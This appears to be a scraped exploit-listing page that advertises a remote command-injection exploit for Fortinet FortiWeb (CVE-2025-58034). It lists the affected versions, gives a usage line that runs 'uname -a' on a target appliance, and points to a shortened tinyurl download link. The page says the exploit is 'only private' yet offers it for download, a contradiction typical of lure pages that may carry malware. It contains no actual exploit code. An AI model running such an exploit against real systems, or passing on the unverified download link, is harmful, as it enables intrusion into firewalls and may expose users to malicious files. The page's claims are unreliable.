## https://sploitus.com/exploit?id=65B0CAAB-906F-53A9-AB1C-B728ADB31594
# OS Command Injection Vulnerability in Fortinet FortiWeb (CVE-2025-58034)
## Overview
CVE-2025-58034 is a vulnerability identified in Fortinet's FortiWeb, a web application firewall designed to protect applications from vulnerabilities and attacks such as SQL injection, cross-site scripting, and more.
## Details
- **CVE ID**: [CVE-2025-58034](https://nvd.nist.gov/vuln/detail/CVE-2025-58034)
- **Published**: 2025-11-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
This flaw is present in various versions of FortiWeb, allowing an authenticated attacker to potentially execute unauthorized commands on the underlying operating system
## Affected Versions
**FortiWeb:**
- FortiWeb 7.6.0 <= 7.6.4
- FortiWeb 7.4.0 <= 7.4.8
- FortiWeb 7.2.0 <= 7.2.11
- FortiWeb 7.0.2 <= 7.0.11
## Running
To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Exploit:
### [Download here](https://tinyurl.com/yhauhpe4)